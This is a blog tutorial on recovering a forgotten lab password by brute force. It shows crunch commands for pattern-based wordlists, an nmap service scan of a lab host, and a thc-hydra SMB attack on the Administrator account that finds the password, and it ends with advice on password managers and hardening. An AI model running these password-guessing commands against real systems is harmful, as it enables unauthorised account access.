Daughter of Typhon and Echidna

One of Us
So you’ve forgot your password. Congratulations! There’s nothing wrong with it and it happens way more often than you think. Of course, you could take care of everything in advance and set up one of the password managers so it could do everything for you, but you’re too busy for this, right?

I use Lastpass for many years now, but regularly I have to create temporary passwords for lab virtual machines, lab routers or even applications that I do not plan to use later anyway.

Well, it looks like we don’t have a choice here –  let’s guess or simply crack our own password.

We’ll need two tools: thc-hydra and crunch. We’ll also use the nmap scanner, but it is worthy of it’s own article.

Young psychic toolkit
What do we know about Hydras? Well we know for sure that it inhabits swamps, has an attack of 16 and defense of 18, and deals damage to all surrounding creatures.
No, not that Hydra.

thc-hydra Is the most popular tool for cracking passwords with dictionary. About 50 protocols are supported, including the most popular like RDP, SSH, FTP, HTTP, SMB.
Crunch is a tool for creating dictionaries according to the given parameters. Of course, we know that with sufficient complexity and the length of the password it’s meaningless to guess it. Random 10-character password is immune to guessing. However, the brutal truth of life is that most users:
a) Choose simple passwords.
b) If there are any complexity requirements to the password, they’ll choose the base of the password, and then finish it with special characters to the desired type.
For example, the user can define “mypassword” as the base and then make it “complex” if he is required to – “%mypassword1A”, “Aamypassword<,!”, “Bmypassword* (“, and so on.

mw0fgc.jpg

Let’s pretend that I know this base for my temporary passwords (for sure I do!), so the first step is to create our own password dictionary.

To create a dictionary, we’ll need a crunch utility. It has a quite simple syntax so the easiest way to understand it is with examples. Take a look:

crunch 2 6 qrs347

With this command we will create a dictionary of words with length from 2 to 6 characters containing symbols q, r, s, 3,4 and 7 in all possible combinations. Now a little bit more complicated example:

crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ -t @@@@1980 -o wordlist.txt

With this command, we’ll create a dictionary of 8-character words, where there will be words according to the pattern: 4 any characters from the specified set, and then “1980”. And then you save the entire dictionary as a text file wordlist.txt.
We can experiment with parameters: exclude duplicate characters, change the order of words in the dictionary, create more complex word patterns, etc.
For our case the command will be:

crunch 14 14 -t @@mypassword@@ -f /usr/share/crunch/charset.lst lalpha-numeric-symbol14 -o mypassword.txt

Here we create a dictionary of words with a length of 14 characters by pattern: 2 characters, then the base “mypassword”, then 2 more characters. All the characters are from file charset.lst. The resulting dictionary will be stored in a file mypassword.Txt

Well, let’s hack ourselves now
thc-hydra has to 2 major operation modes: using a dictionary or using a bruteforce. Strictly speaking, in the bruteforce mode thc-hydra generates dictionaries on the fly. The same dictionary that we made a minute ago with crunch. I prefer to use dictionaries, as it allows to break complex tasks into stages.

I’m sure our user name is Administrator, and we only have to guess his password.
Oo82Irt.png

Let’s start by figuring out which services are running on our server (192.168.70.128). It is necessary to find out to understand what door should we knock. nmap gives us everything:

nmap -sV -T4 192.168.70.128
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 46.15% done; ETC: 11:30 (0:00:42 remaining)
Nmap scan report for 192.168.70.128
Host is up (0.000080s latency).
Not shown: 987 closed ports
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
80/tcp    open  http         Microsoft IIS httpd 8.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl          Microsoft SChannel TLS
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC

We can choose anything from here – FTP, HTTP, SMB and even RDP. In terms of thc-hydra it is almost the same, and the syntax of further commands will be similar. For example, using SMB:

hydra -l administrator -P mypassword.txt -t 1 192.168.70.128 smb
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-03-15 11:58:04
[DATA] max 1 task per 1 server, overall 1 task, 6250000 login tries (l:1/p:6250000), ~6250000 tries per task
[DATA] attacking smb://192.168.70.128:445/
[445][smb] host: 192.168.70.128   login: administrator   password: aamypasswordaz
1 of 1 target successfully completed, 1 valid password found

Now we got it – Aamypasswordaz is our password. Pretty easy, right?

It is obvious that individual services are more susceptible to these attacks than the other. For example, if you enable Network Level Authentication for RDP, the task becomes almost impossible. However, we used nmap for a reason – potential attacker will look for the easiest way to access. If there are narrow windows of RDP and HTTP, they can be ignored by passing through the front door of SMB.
The syntax of specific commands for different protocols will be, of course, different, and in general this type of attack has a lot of nuances, but this example shows how easy it is to organize such an attack, and that it is available to people even with very low training.
1_xwScPTcIGgjWfZIcEeR2oA.png

So use password managers and do not neglect the best practices.

 

2 thoughts on “Daughter of Typhon and Echidna”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s